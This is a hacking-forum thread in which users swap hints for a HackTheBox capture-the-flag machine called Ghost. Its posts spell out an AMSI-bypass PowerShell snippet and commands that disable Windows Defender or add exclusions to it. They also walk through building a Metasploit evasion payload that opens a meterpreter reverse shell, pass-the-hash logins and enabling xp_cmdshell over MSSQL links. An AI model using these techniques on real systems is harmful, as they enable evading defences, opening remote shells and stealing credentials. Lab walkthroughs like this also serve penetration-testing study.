Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#91
(Jul 15, 2024, 01:56 AM)maggi Wrote:
(Jul 15, 2024, 01:42 AM)osamy7593 Wrote:
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote: I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote: bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like


Yes this works too bypassing amsi .. Ok what u got

I have been readin the stuff on cross forest attacks....it is not quite clicking yet; well I don'tknow if I am messing up bloodhound anal-sis or I am plain illiterate glosing over soemthing in the readings

Direction              : BiDirectional

Someone told me golden ticket

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#92
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

with nt authority rights you can disable the av using the powershell command

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like


with the nt authority rights you can disable the real time a/v monitoring using the powershell command. this will help you with downloading and using the mimikatz and other tools.

Set-MpPreference -DisableRealtimeMonitoring $true
Reply
#93
(Jul 15, 2024, 02:57 AM)bmoon10 Wrote:
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote: I started running powerview but the av is whinging about everything else

with nt authority rights you can disable the av using the powershell command

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like


with the nt authority rights you can disable the real time a/v monitoring using the powershell command. this will help you with downloading and using the mimikatz and other tools.

Set-MpPreference -DisableRealtimeMonitoring $true

I can't get mimi to run, it hangs with a #, but I can now get msf to run

take it back spawned a fresh shell with nc and mimi loads....face palm for not trying that a while ago, but idk if thats the way.....
Reply
#94
it's weird even the user flag hasn't shown up yet.
not sure what to do next after getting administrator on primary.corp.ghost.htb, tried dcsync, golden ticket, silver ticket. the user should be in the domain admins group already, what else to do?
Reply
#95
(Jul 15, 2024, 12:43 AM)jimmyshoemacher Wrote: im stuck on ntauthority in PRIMARY

does anyone know where to go from here?

i can't run mimikatz, tried to obfuscate it doesn't work

I have tried many meterpreter shells those all get blocked.

i have a shell as ntauthority but no clue what to do at this point.

you can evade av using meterpreter windows defender evasion method
msf> use evasion/windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set payload windows/x64/meterpreter/reverse_https
msf6 evasion(windows/windows_defender_exe) > set lport 5555
msf6 evasion(windows/windows_defender_exe) > set lhost tun0
msf6 evasion(windows/windows_defender_exe) > run

[*]Compiled executable size: 4608
[+] cop.exe stored at /home/kali/.msf4/local/cop.exe

transfer the cop.exe to the target windows box

msf6 evasion(windows/windows_defender_exe) > handler -p windows/x64/meterpreter/reverse_https -H 0.0.0.0 -P 5555

execute the cop.exe in the target windows box for the meterpreter session
Reply
#96
(Jul 14, 2024, 08:40 PM)jimmyshoemacher Wrote:
(Jul 14, 2024, 07:41 PM)mmkz Wrote: Primary...
└─$ proxychains4 -q crackmapexec smb 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'
SMB        10.0.0.10      445    PRIMARY         
[*]Windows Server 2022 Build 20348 x64 (name:PRIMARY) (domain:corp.ghost.htb) (signing:True) (SMBv1:False)
SMB        10.0.0.10      445    PRIMARY          [+] corp.ghost.htb\Administrator:41515af3ada195029708a53d941ab751 (Pwn3d!)

└─$ proxychains4 -q evil-winrm -i 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
ghost-corp\administrator

Bloodhound...
[PRIMARY] --- Trusted by ---> [DC]
 
What's next?


i keep getting a connection refused when trying to connect with evil-winrm, what am i doing wrong? using 10.0.0.10 , what do i put in hosts file?

use ligolo-ng, i did struggle for it too
Reply
#97
If someone stuck with mssql, in thread missed 2 things:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > REGONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"
Reply
#98
(Jul 15, 2024, 07:40 AM)wh1t3_r4bb1t Wrote: If someone stuck with mssql, in thread missed 2 things:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > REGONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility after the 'exec_as_login sa' step use the enable_xp_cmdshell command .. it executes the same 4 lines EXEC sp_configure , RECONFIGURE etc.,
Reply
#99
(Jul 15, 2024, 08:32 AM)bmoon10 Wrote:
(Jul 15, 2024, 07:40 AM)wh1t3_r4bb1t Wrote: If someone stuck with mssql, in thread missed 2 things:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > REGONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility after the 'exec_as_login sa' step use the enable_xp_cmdshell command .. it executes the same 4 lines EXEC sp_configure , RECONFIGURE etc.,

No, I was getting "let administrator enable xp_cmdshell" message after it, so need to enable it manually.
UPD. oh you mean "enable_xp_cmdshell", got it
Reply
(Jul 15, 2024, 10:01 AM)spamdegratis5 Wrote: I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.


with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,588 24 minutes ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,942 9 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,799 10 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,616 Today, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,269 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)